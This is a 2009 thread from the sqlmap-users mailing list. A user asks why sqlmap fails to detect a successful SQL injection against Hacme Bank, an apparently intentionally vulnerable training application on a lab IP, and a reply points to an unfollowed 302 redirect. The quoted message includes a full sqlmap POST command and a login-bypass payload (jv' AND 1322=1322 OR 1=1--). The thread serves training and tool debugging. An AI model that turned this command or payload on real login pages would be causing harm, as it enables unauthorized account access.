Re: [sqlmap-users] sqlmap and Hacme Bank
Brought to you by:
inquisb
From: Giorgio F. <gio...@gm...> - 2009-07-09 07:00:07
|
Hi Richard, as far as I remember, Hackme Bank login page replies to the user with a temporary redirect. Sqlmap will see the same answer from both the false and the true injection. Btw the reason why sqlmap may not work is that it does not follow the 302 redirect to the new location specified in the response. Having sqlmap working with Hackme Bank would be very useful for training purposes; hope to be helpful in the solution of the problem. Giorgio 2009/6/18 Richard Jones <wp...@gm...>: > Hi all, > > Sorry this ended up so long.....I wanted to fully explain my situation :) > > I've been playing with sqlmap against Foundstone's Hacme Bank and have been > making some progress. > > Here is the command I've come up with: > > ./sqlmap.py -u "http://192.168.200.11/HacmeBank_v2_Website/aspx/login.aspx" > --method=POST -p "txtUserName" > --cookie="ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5; > Admin=false" > --data="__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit" > -v 5 --prefix="'" --postfix=" OR 1=1--" --batch > > I can confirm that this command is able to gain access to the HacmeBank site > with this crafted string: jv' AND 1322=1322 OR 1=1-- (Unicode decoded, of > course). Some other crafted strings from sqlmap are successful as well. > > BUT, sqlmap doesn't seem to detect that it is successful in gaining access. > I think the problem exists in the --regexp string.....as in I can't find a > regexp that works.... > > From the sqlmap docs, --regexp lets the user "provide a string which is > always present on the not injected page and on all True injected query > pages, but that it is not on the False ones". The problem I think am I > running into is finding a string that is present on the not injected page, > but no on the false pages. > > The strings that I have been trying to match are: > Not Injected Page: Message"></span> > True Injected Page: Message">Line 1: Incorrect syntax near 'asdf'.</span> > False Injected Page: Message">Invalid Login</span> > > My question is how is the "not injected" page detected? When watching the > output on level 5 verbosity, I see this request. I assume this is the > request to determine the "Not Injected" page? > > [11:42:28] [INFO] testing if the provided regular expression matches within > the target URL page content > [11:42:30] [TRAFFIC OUT] HTTP request: > POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1 > Content-length: 105 > Accept-language: en-us,en;q=0.5 > Connection: Keep-Alive > Accept: > text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 > User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > Host: 192.168.200.11:80 > Cookie: ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5; > Admin=false > Content-type: application/x-www-form-urlencoded > __VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit > > This request sends in the POST data that I provided at the command line. > This data causes an "Invalid Login" from the login page, which is exactly > what happens when a False injected query occurs as well. In fact, the HTML > that comes back from this "Not Injected" request is identical to the HTML > that comes back from a False injected page. > > So, in this situation, I feel that sqlmap isn't requesting the "Not > Injected" page correctly. In my mind, that would involve a GET request, > with no login data, to login.aspx, not a POST to that page. The GET should > return a page that doesn't have the "Invalid Login" text that gets returned > to a POST with invalid credentials. > > So, can I get sqlmap to detect the "Not Injected" page with a simple GET > request, but then perform the sql injection using POST requests? Or is > there something else that needs done? I tried changing --method to GET, as > well as removing --method, but the GET that is sent for the "Not Injected" > page still contains the POST data, which still results in "Invalid Login". > > Or I am confused on how this should work? > > Thanks! > > Richard > > ------------------------------------------------------------------------------ > Crystal Reports - New Free Runtime and 30 Day Trial > Check out the new simplified licensing option that enables unlimited > royalty-free distribution of the report engine for externally facing > server and web deployment. > http://p.sf.net/sfu/businessobjects > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |